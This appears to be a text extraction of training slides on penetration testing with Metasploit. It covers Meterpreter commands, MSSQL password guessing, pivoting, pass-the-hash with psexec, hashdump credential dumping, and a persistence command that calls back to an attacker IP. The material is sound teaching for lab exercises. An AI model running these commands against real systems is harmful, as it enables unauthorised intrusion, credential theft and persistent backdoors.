Professional Documents
Culture Documents
Pentesting With Metasploit
Pentesting With Metasploit
Metasploit
Georgia Weidman
Acknowledgements
Metasploit Team
Offensive Security/Metasploit Unleashed
Hackers for Charity
David Kennedy
BSides Delaware Crew
Darren
Agenda
Metasploit Basics
Some terminology/brief intro to pentesting
How Metasploit works
Interacting with Metasploit
Basic Exploitation
Exploiting a vulnerability using Metasploit console
Using Meterpreter
Using the Meterpreter shell for post exploitation
Agenda
Metasploit in a penetration test
Information Gathering
Vulnerability Scanning
Exploitation in depth
Post exploitation
Reporting
Connecting
Wireless access point SSID IgnatiusRiley
Password: metasploit
What is Metasploit?
Exploitation framework
Ruby based
Modular
Exploits, payloads, auxiliaries, and more
Metasploit Terminology
Exploit: vector for penetrating the system
Payload: shellcode, what you want the exploit to
do
Encoders: encode or mangle payload
Auxiliary: other modules besides exploitation
Session: connection from a successful exploit
Metasploit Interfaces
Msfconsole
Msfcli
Msfweb, Msfgui (discontinued)
Metasploit Pro, Metasploit Express
Armitage
Exploitation Streamlining
Traditional Pentest:
Find public exploit
Change offsets and return address for your target
Replace shellcode
Metasploit:
Load Metasploit module
Select target OS
Set IP addresses
Select payload
Sessions
sessions -l lists all active sessions
Sessions i <id> interact with a given session
Meterpreter
Gain a session using a meterpreter payload
Memory based/never hits the disk
Everything a shell can do plus extra
Meterpreter Commands
help shows all available commands
background backgrounds the session
ps shows all processes
migrate <process id> moves meterpreter to
another process
getuid shows the user
Meterpreter Commands
download <file> - pulls a file from the victim
upload <file on attacker> <file on victim> pushes a file to the victim
hashdump dumps the hashes from the sam
shell drops you in a shell
Exercise
Information Gathering
Learning as much about a target as possible
Examples: open ports, running services, installed
software
Identify points for further exploration
Portscanning
Queries a host to see if a program is listening
Ex: Browsing to a website webserver listens on
port 80
Listening ports are accessible by an attacker and
if vulnerable may be used for exploitation
Ex: ms08_067_netapi exploits smb on port 445
Vulnerability Scanning
Query systems for potential vulnerabilities
Identify potential methods of penetration
Ex: SMB version scan in information gathering
returned port 445 open and target Windows
XP SP2, scan for ms08_067_netapi
vulnerability
Our Database
hosts
services
vulns
-c select columns
-s search for specific string
db_autopwn
By default just runs all the exploits that match a
given open port
Not stealthy
Using vulnerability data can be made smarter,
matches vulnerabilities instead of ports
db_autopwn -x -e
Attacking MSSQL
MSSQL TCP port can change, UDP port is 1434
msf> search mssql (shows all mssql modules)
msf> use scanner/mssql/mssql_ping (queries
UDP 1434 for information including TCP port)
msf> use scanner/mssql/mssql_login (tries
passwords to log into mssql)
msf> use windows/mssql/mssql_payload (logs
into mssql and gets a shell
Meterpreter: Migrating
If the process that hosts meterpreter closes
meterpreter dies too
Example: client side exploit residing in the
browser
meterpreter> ps (shows all processes)
meterpreter> migrate <process id> (moves to a
new process)
Pivoting
Scenario: Exploit a dual networked host, with a
routeable interface and non routable one. Can we
attack other hosts on the non routeable interface
without SSH tunneling?
Route add 10.0.0.0/24 1 (routes traffic to the
subnet through session 1)
Now you can portscan, exploit, etc. the non
routable subnet
PSExec
hashdump (dumps the hashes, not always easy
to crack)
Why not just pass the hash to other systems?
use windows/smb/psexec
set SMBPass to the hash
Meterpreter: Persistence
Persistence script installs a meterpreter service
Meterpreter comes back when the box restarts
Ex: run persistence -U -i 5 -p 443 r
192.168.20.101 (respawns on login, at a 5
second interval on port 443 to ip
192.168.20.101)
Exercises
Perform a penetration test on the Windows and
Linux systems we used in class
Perform a penetration test on the lab network
Contact
Georgia Weidman
Website: http://www.grmn00bs.com
http://www.georgiaweidman.com
Email: georgia@grmn00bs.com
Twitter: @vincentkadmon